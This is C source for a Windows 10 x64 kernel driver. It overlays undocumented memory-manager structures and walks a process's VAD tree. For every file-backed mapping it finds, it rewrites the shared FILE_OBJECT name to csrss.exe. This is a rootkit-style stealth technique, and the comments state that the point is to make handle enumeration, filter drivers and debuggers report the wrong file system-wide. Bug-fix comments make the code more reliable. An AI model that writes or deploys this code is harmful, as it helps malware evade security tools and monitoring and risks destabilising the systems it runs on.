win 10 64 14393遍历进程VAD

/*
 * Partial overlay of nt!_SEGMENT for Windows 10 x64 build 14393.  Only the
 * first 0x28 bytes are declared; the real object continues (SegmentLock at
 * +0x28, u1, u2, PrototypePte at +0x40, ...), so this type may only be used
 * through a pointer -- never sizeof()'d, copied by value or placed in an array.
 *
 * Offsets come from the WinDbg dump kept below and must be re-verified with
 * `dt nt!_SEGMENT` on any other build.
 */
typedef struct _SEGMENT{
 /*(*((ntkrnlmp!_SEGMENT *)0xffffa405114286d0))[Type:_SEGMENT]
  [+0x000] ControlArea      : 0xffffd18b3276d370[Type:_CONTROL_AREA *]
  [+0x008] TotalNumberOfPtes : 0xa[Type:unsigned long]
  [+0x00c] SegmentFlags[Type:_SEGMENT_FLAGS]
  [+0x010] NumberOfCommittedPages : 0x0[Type:unsigned __int64]
  [+0x018] SizeOfSegment : 0xa000[Type:unsigned __int64]
  [+0x020] ExtendInfo : 0x5dd00000[Type:_MMEXTEND_INFO *]
  [+0x020] BasedAddress : 0x5dd00000[Type:void *]
  [+0x028] SegmentLock[Type:_EX_PUSH_LOCK]
  [+0x030] u1[Type:]
  [+0x038] u2[Type:]
  [+0x040] PrototypePte : 0xffffa4050feab820[Type:_MMPTE *]*/
 PVOID ControlArea;               /* +0x000: back-pointer to the owning _CONTROL_AREA */
 LONG32 TotalNumberOfPtes;        /* +0x008: the dump types this as unsigned long; declared signed here, same size */
 LONG32 SegmentFlags;             /* +0x00c: _SEGMENT_FLAGS bit set, opaque to this code */
 ULONG64 NumberOfCommittedPages;  /* +0x010 */
 ULONG64 SizeOfSegment;           /* +0x018: 0xa000 in the dump, i.e. TotalNumberOfPtes (0xa) pages */
 ULONG64 BasedAddress;            /* +0x020: unioned with ExtendInfo in the real type; original note: the module
                                     name could also be recovered from the PE headers mapped at this address
                                     (not done here, unverified) */
 //.............


}SEGMENT,*PSEGMENT;
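/*
 * nt!_EX_FAST_REF: a pointer whose low bits double as a fast reference count.
 * On x64 kernels the count occupies the low 4 bits (pool blocks are 16-byte
 * aligned, MAX_FAST_REFS = 15); the 3-bit width that was declared here is the
 * x86 layout.  Strip the count with `Value & ~0xF` before dereferencing the
 * pointer -- masking only 3 bits leaves the pointer off by 8 whenever bit 3
 * of the count is set.  Confirm with `dt nt!_EX_FAST_REF` on the target build.
 */
typedef struct _EX_FAST_REF
{
 union
 {
  PVOID Object;          /* pointer with the count bits still set; do not dereference as-is */
  ULONG_PTR RefCnt : 4;  /* fast reference count, low 4 bits on x64 */
  ULONG_PTR Value;       /* raw word; mask the low 4 bits to get the object pointer */
 };
} EX_FAST_REF, *PEX_FAST_REF;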
/*
 * Partial overlay of nt!_CONTROL_AREA for Windows 10 x64 build 14393, declared
 * down to ControlAreaLock at +0x48; the real object continues (WaitList, u2,
 * FileObjectLock, LockedPages, ...), so use it via pointer only -- never
 * sizeof()/copy/array.  The only member this file actually consumes is
 * FilePointer.  Offsets come from the WinDbg dump below; re-verify with
 * `dt nt!_CONTROL_AREA` on other builds.
 */
typedef struct _CONTROL_AREA {
 /**
 (*((ntkrnlmp!_CONTROL_AREA *)0xffffd18b3276d370))[Type:_CONTROL_AREA]
  [+0x000] Segment          : 0xffffa405114286d0[Type:_SEGMENT *]
  [+0x008] ListHead[Type:_LIST_ENTRY]
  [+0x018] NumberOfSectionReferences : 0x1[Type:unsigned __int64]
  [+0x020] NumberOfPfnReferences : 0xa[Type:unsigned __int64]
  [+0x028] NumberOfMappedViews : 0x4[Type:unsigned __int64]
  [+0x030] NumberOfUserReferences : 0x5[Type:unsigned __int64]
  [+0x038] u[Type:]
  [+0x03c] u1[Type:]
  [+0x040] FilePointer[Type:_EX_FAST_REF]
  [+0x048] ControlAreaLock : 0[Type:long]
  [+0x04c] ModifiedWriteCount : 0x0[Type:unsigned long]
  [+0x050] WaitList : 0x0[Type:_MI_CONTROL_AREA_WAIT_BLOCK *]
  [+0x058] u2[Type:]
  [+0x068] FileObjectLock[Type:_EX_PUSH_LOCK]
  [+0x070] LockedPages : 0x1[Type:unsigned __int64]
  [+0x078] u3[Type:]
  */
 PSEGMENT  Segment;//+0x000: owning _SEGMENT; Segment->ControlArea points back to this object
 LIST_ENTRY ListHead;//+0x008: not used by this code
 unsigned __int64 NumberOfSectionReferences; //+0x018
 unsigned __int64 NumberOfPfnReferences;//+0x020
 unsigned __int64 NumberOfMappedViews;//+0x028: 4 in the dump -- one control area serves every view of the section
 unsigned __int64 NumberOfUserReferences;//+0x030
 ULONG32 u;//+0x038: flag union, type not shown in the dump; opaque here
 ULONG32 u1;//+0x03c: second flag union, opaque here
 EX_FAST_REF FilePointer;//+0x040: the backing FILE_OBJECT; low bits carry a ref count and must be masked before use.
                         //        Because one control area is shared by all views of the file, any change made
                         //        to that FILE_OBJECT is visible to every process mapping it.
  long ControlAreaLock;//+0x048: kernel-internal lock word; this file reads FilePointer without taking it
  //.........
  //............
}CONTROL_AREA,*PCONTROL_AREA;
/*
 * Partial overlay of nt!_SUBSECTION: only the first three pointers
 * (+0x000..+0x017) are declared; the comment inside lists the members that
 * follow.  Pointer use only -- never sizeof()/copy/array.  `struct MMPTE` is
 * an intentionally incomplete tag: the prototype PTE array is never
 * dereferenced by this file.
 */
typedef struct _SUBSECTION {
 
 PCONTROL_AREA ControlArea;          /* +0x000: the control area whose FilePointer names the backing file */
 struct MMPTE* SubsectionBase;       /* +0x008: first prototype PTE of this subsection (opaque here) */
 struct _SUBSECTION* NextSubsection; /* +0x010: singly-linked chain of subsections; not followed by this code */
  /*+ 0x018 GlobalPerSessionHead : _RTL_AVL_TREE
  + 0x018 CreationWaitList : Ptr64 _MI_CONTROL_AREA_WAIT_BLOCK
  + 0x018 SessionDriverProtos : Ptr64 _MI_PER_SESSION_PROTOS
  + 0x020 u :
  +0x024 StartingSector : Uint4B
  + 0x028 NumberOfFullSectors : Uint4B
  + 0x02c PtesInSubsection : Uint4B
  + 0x030 u1 :
  +0x034 UnusedPtes : Pos 0, 31 Bits
  + 0x034 DirtyPages : Pos 31, 1 Bit
  + 0x034 u2 : */

}SUBSECTION,*PSUBSECTION;
/*
 * Overlay of nt!_MMVAD for Windows 10 x64 build 14393.  Core is the leading
 * 0x40-byte _MMVAD_SHORT, left opaque; the balanced-tree links that
 * VadPreOrderTraverse follows are assumed to sit at Core+0, which is why that
 * routine casts a PRTL_BALANCED_NODE straight to PMMVAD.
 *
 * Every member below is naturally 8-byte aligned, so pack(1) does not alter
 * the layout; note that `#pragma pack()` afterwards resets packing to the
 * default rather than restoring a pushed state (use pack(push,1)/pack(pop)
 * if this header is ever included after other packing directives).
 *
 * NOTE(review): a VAD tree also holds bare _MMVAD_SHORT nodes for private
 * memory, which are only 0x40 bytes long; the members from u2 onward do not
 * exist on those nodes, so a caller needs a type check on Core's flags before
 * reading them (confirm the bit layout with `dt nt!_MMVAD_FLAGS`).
 */
#pragma pack(1)
typedef struct __MMVAD{
/*
 +0x000 Core             : _MMVAD_SHORT
  + 0x040 u2 :
  +0x048 Subsection : Ptr64 _SUBSECTION
  + 0x050 FirstPrototypePte : Ptr64 _MMPTE
  + 0x058 LastContiguousPte : Ptr64 _MMPTE
  + 0x060 ViewLinks : _LIST_ENTRY
  + 0x070 VadsProcess : Ptr64 _EPROCESS
  + 0x078 u4 :
  +0x080 FileObject : Ptr64 _FILE_OBJECT*/
 char Core[0x40];             /* +0x000: _MMVAD_SHORT (tree node, VPN range, flags), opaque here */
 ULONG64 u2;                  /* +0x040: flag union, opaque here */
 PSUBSECTION Subsection;      /* +0x048: leads to ControlArea->FilePointer, the path this file uses */
 PMMPTE FirstPrototypePte;    /* +0x050 */
 PMMPTE LastContiguousPte;    /* +0x058 */
 LIST_ENTRY64 ViewLinks;      /* +0x060 */
 PEPROCESS VadsProcess;       /* +0x070: used by the traversal as a "this is a mapped section" heuristic */
 ULONG64 u4;                  /* +0x078 */
 PFILE_OBJECT FileObject;     /* +0x080: declared but not consumed by the traversal */
}MMVAD,*PMMVAD;
#pragma  pack()

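/* Name written over the FileName of every file-backed mapping the walk finds. */
#define VAD_SPOOF_NAME L"C:\\WINDOWS\\system32\\csrss.exe"

/*
 * Overwrite file_object->FileName with VAD_SPOOF_NAME, in place.
 *
 * The write is bounded by FileName.MaximumLength: the original copied
 * sizeof(VAD_SPOOF_NAME) bytes unconditionally, which overruns the pool
 * buffer whenever the real name is shorter than the spoof string.
 * UNICODE_STRING.Length is set without the terminating NUL (the original
 * counted it).  Every access is under SEH because file_object is only known
 * to be on a resident page, not known to be a live FILE_OBJECT.
 *
 * This mutates a kernel object shared by every mapping of the file, and does
 * so without taking any lock on it; a concurrent reader may observe a torn
 * name.  Anything that later reads the name (handle enumeration, filter
 * drivers, debuggers) will report csrss.exe for this file -- that is the
 * point of the routine, and it is system-wide, not per-process.
 */
static VOID VadSpoofFileName(PFILE_OBJECT file_object)
{
    __try {
        if (file_object->FileName.Buffer != 0 &&
            file_object->FileName.MaximumLength >= sizeof(VAD_SPOOF_NAME)) {
            memset(file_object->FileName.Buffer, 0x0, file_object->FileName.MaximumLength);
            memcpy(file_object->FileName.Buffer, VAD_SPOOF_NAME, sizeof(VAD_SPOOF_NAME));
            /* Length excludes the NUL; MaximumLength >= sizeof() guarantees it fits. */
            file_object->FileName.Length =
                (unsigned short)(sizeof(VAD_SPOOF_NAME) - sizeof(VAD_SPOOF_NAME[0]));
            DbgPrint("File Name:%wZ \n", &file_object->FileName);
        } else {
            DbgPrint("FileName buffer too small for spoof (%u bytes), skipping %p\n",
                     (unsigned)file_object->FileName.MaximumLength, file_object);
        }
    }
    __except (1) { /* EXCEPTION_EXECUTE_HANDLER */
        DbgPrint("exception");
    }
}

/*
 * Pre-order walk of a process VAD tree that spoofs the backing file name of
 * every node that looks like a file-backed mapping.
 *
 * VaddTree: root of the tree or of a subtree.  The RTL_BALANCED_NODE links are
 *           assumed to live at offset 0 of the _MMVAD (see __MMVAD::Core),
 *           which is why the node pointer is cast straight to PMMVAD.  NULL or
 *           an unmapped pointer is a no-op.
 *
 * For each node whose VadsProcess field is mapped, the walk follows
 * Subsection->ControlArea->FilePointer and rewrites that FILE_OBJECT's
 * FileName (see VadSpoofFileName).  FilePointer is an EX_FAST_REF: on x64 the
 * low 4 bits are a reference count and are masked off here; the original
 * cleared only 3, leaving the pointer off by 8 whenever bit 3 of the count is
 * set (MmIsAddressValid does not catch that -- same page).
 *
 * Caveats a caller must know:
 *  - No lock is held on the owning process's VAD tree while walking; a
 *    concurrent allocation/free in that process can free a node under us, and
 *    MmIsAddressValid() only proves the page is resident, not that the node is
 *    still a VAD.
 *  - "VadsProcess is mapped" is a heuristic, not a type check.  The tree also
 *    holds 0x40-byte _MMVAD_SHORT nodes (private memory) that end where
 *    Subsection/VadsProcess begin, so on those nodes the reads below run past
 *    the allocation and may pick up a neighbouring pool pointer that happens
 *    to be mapped.  Gating on the VadType bits in Core's VadFlags (confirm the
 *    layout with `dt nt!_MMVAD_FLAGS` on this build) before the cast is the
 *    proper fix -- TODO.
 *  - The right subtree is visited before the left, as in the original.
 */
VOID VadPreOrderTraverse(PRTL_BALANCED_NODE VaddTree) {
    if (!MmIsAddressValid(VaddTree)) {
        return;
    }

    PMMVAD vad = (PMMVAD)VaddTree;

    if (MmIsAddressValid(vad->VadsProcess)) {
        PSUBSECTION subsection = vad->Subsection;
        if (MmIsAddressValid(subsection) && MmIsAddressValid(subsection->ControlArea)) {
            /* EX_FAST_REF on x64: clear all four count bits, not just three. */
            PFILE_OBJECT file_object =
                (PFILE_OBJECT)(subsection->ControlArea->FilePointer.Value & ~(unsigned long long)0xF);
            if (MmIsAddressValid(file_object)) {
                VadSpoofFileName(file_object);
            }
        }
    }

    /* The callee re-validates its argument; checking here just skips a call per NULL leaf. */
    if (MmIsAddressValid(VaddTree->Right)) {
        VadPreOrderTraverse(VaddTree->Right);
    }
    if (MmIsAddressValid(VaddTree->Left)) { /* the original had a stray ';' after this if */
        VadPreOrderTraverse(VaddTree->Left);
    }
}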
